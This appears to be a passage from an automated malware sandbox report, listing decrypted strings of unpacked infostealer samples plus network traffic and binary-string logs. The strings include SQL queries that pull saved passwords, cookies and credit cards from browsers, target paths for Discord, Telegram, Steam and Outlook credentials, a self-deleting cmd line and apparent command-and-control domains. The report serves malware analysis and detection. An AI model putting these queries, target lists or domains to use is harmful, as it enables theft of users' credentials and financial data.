Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptSetProperty
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptDestroyKey
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetWindowRect
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetDesktopWindow
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetDC
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CloseWindow
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: wsprintfA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CharToOemW
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: wsprintfW
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RegQueryValueExA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RegEnumKeyExA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RegOpenKeyExA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RegCloseKey
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RegEnumValueA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CryptUnprotectData
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SHGetFolderPathA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ShellExecuteExA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetOpenUrlA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetConnectA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetCloseHandle
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetOpenA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HttpSendRequestA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HttpOpenRequestA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetReadFile
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: InternetCrackUrlA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: StrCmpCA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: StrStrA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: StrCmpCW
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PathMatchSpecA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RmStartSession
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RmRegisterResources
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RmGetList
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: RmEndSession
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_open
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_step
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_column_text
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_finalize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_close
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3_column_blob
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: encrypted_key
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PATH
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: NSS_Init
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: NSS_Shutdown
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PK11_FreeSlot
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PK11_Authenticate
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: C:\ProgramData\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: browser:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: profile:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: url:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: login:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: password:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Opera
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: OperaGX
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Network
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: cookies
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: .txt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: TRUE
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: FALSE
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: autofill
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: history
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: cc
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: name:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: month:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: year:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: card:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Cookies
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Login Data
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Web Data
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: History
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: logins.json
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: formSubmitURL
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: usernameField
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: encryptedUsername
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: encryptedPassword
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: guid
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: cookies.sqlite
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: formhistory.sqlite
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: places.sqlite
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: plugins
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Local Extension Settings
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Sync Extension Settings
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: IndexedDB
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Opera Stable
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Opera GX Stable
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CURRENT
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: chrome-extension_
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Local State
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: profiles.ini
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: chrome
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: opera
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: firefox
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: wallets
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ProductName
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: x32
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: x64
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ProcessorNameString
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DisplayName
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DisplayVersion
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Network Info:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - IP: IP?
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Country: ISO?
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: System Summary:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - HWID:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - OS:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Architecture:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - UserName:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Computer Name:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Local Time:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - UTC:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Language:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Keyboards:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Laptop:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Running Path:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - CPU:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Threads:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Cores:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - RAM:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - Display Resolution:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: - GPU:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: User Agents:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Installed Apps:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: All Users:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Current User:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Process List:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: system_info.txt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: freebl3.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: mozglue.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: msvcp140.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: nss3.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: softokn3.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: vcruntime140.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Temp\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: .exe
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: runas
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: open
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: /c start
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %DESKTOP%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %APPDATA%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %USERPROFILE%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %DOCUMENTS%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %RECENT%
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: *.lnk
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: files
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \discord\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Telegram Desktop\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: key_datas
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: map*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Telegram
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Tox
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: *.tox
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: *.ini
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Password
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 00000001
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 00000002
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 00000003
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 00000004
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Pidgin
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \.purple\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: accounts.xml
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: token:
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Software\Valve\Steam
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SteamPath
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \config\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ssfn*
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: config.vdf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DialogConfig.vdf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: libraryfolders.vdf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: loginusers.vdf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Steam\
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sqlite3.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: browsers
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: done
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: soft
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: https
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: POST
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HTTP/1.1
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: hwid
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: build
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: token
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: file_name
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: file
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: message
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: screenshot.jpg
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: moutheventushz.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: respectabosiz.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: bakedstusteeb.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: conceszustyb.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: nightybinybz.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: standartedby.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: mutterissuen.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: worddosofrm.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: worddosofrm.shop
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: TeslaBrowser/5.5
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: - Screen Resoluton:
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: - Physical Installed Memory:
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: Workgroup: -
Source: 7.2.freecam.exe.1204e000.2.unpack	String decryptor: MkfS5f--

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:60467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60481 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:60494 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:60523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:60524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:60527 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:60538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:60537 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60560 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60563 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60570 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60572 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60573 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60574 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:60575 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: c4df60870c.exe, 0000000A.00000002.3022164511.000000006BF0D000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: nss3.pdb@ source: c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: my_library.pdbU source: c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: freecam.exe, 00000007.00000002.2708343431.0000000011E2E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: +Inf-1.0-Inf-inf...:...`.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl.crt.crx.csh.css.csv.cxx.dar.dcr.deb.def.der.dif.dir.dmg.doc.dot.drw.dvi.dwf.dwg.dxf.dxr.elc.eml.env.eps.etx.evy.exe.f77.f90.fdf.fif.fli.flo.flv.flw.flx.fmf.for.fpx.frl.gif.gsd.gsm.gsp.gss.hdf.hgl.hlb.hlp.hpg.hqx.hta.htc.htm.htt.htx.ice.ico.ics.icz.idc.ief.igs.ima.inf.ins.isu.ivr.ivy.jam.jav.jcm.jpe.jpg.jps.jut.kar.key.kfo.kml.kmz.kon.kpr.kpt.ksh.ksp.kth.kwd.kwt.lam.lha.lhx.lma.log.lsp.lst.lsx.ltx.lzh.lzx.m1v.m2a.m2v.m3u.man.map.mar.mbd.mc$.mcd.mcf.mcp.mht.mid.mif.mjf.mjs.mme.mod.mov.mp2.mp3.mp4.mpa.mpc.mpe.mpg.mpp.mpt.mpv.mpx.mrc.mzz.nan.nap.ncm.nif.nix.nsc.nvd.oda.odb.odc.odf.odg.odi.odm.odp.ods.odt.oex.oga.ogg.ogv.omc.otc.otf.otg.oth.oti.otm.otp.ots.ott.p10.p12.p7a.p7c.p7m.p7r.p7s.pas.pbm.pcl.pct.pcx.pdb.pdf.pgm.pic.pkg.pko.plx.pm4.pm5.png.pnm.pot.pov.ppa.ppm.pps.ppt.ppz.pre.prt.psd.pvu.pwz.pyc.qcp.qd3.qif.qtc.qti.ram.rar.ras.rgb.rmi.rmm.rmp.rng.rnx.rpm.rtf.rtx.s3m.s7z.sbk.scm.sdp.sdr.sea.set.sgm.sid.sit.skd.skm.skp.skt.smi.snd.sol.spc.spl.spr.spx.src.ssi.ssm.sst.stl.stp.svf.svg.svr.swf.tar.tbk.tcl.tex.tgz.tif.tsi.tsp.tsv.txt.uil.uni.unv.uri.uue.vcd.vcf.vcs.vda.vdo.vew.viv.vmd.vmf.voc.vos.vox.vqe.vqf.vql.vrt.vsd.vst.vsw.w60.w61.w6w.wav.wb1.web.wiz.wk1.wmf.wml.wp5.wp6.wpd.wq1.wri.wrl.wrz.wsc.wtk.xb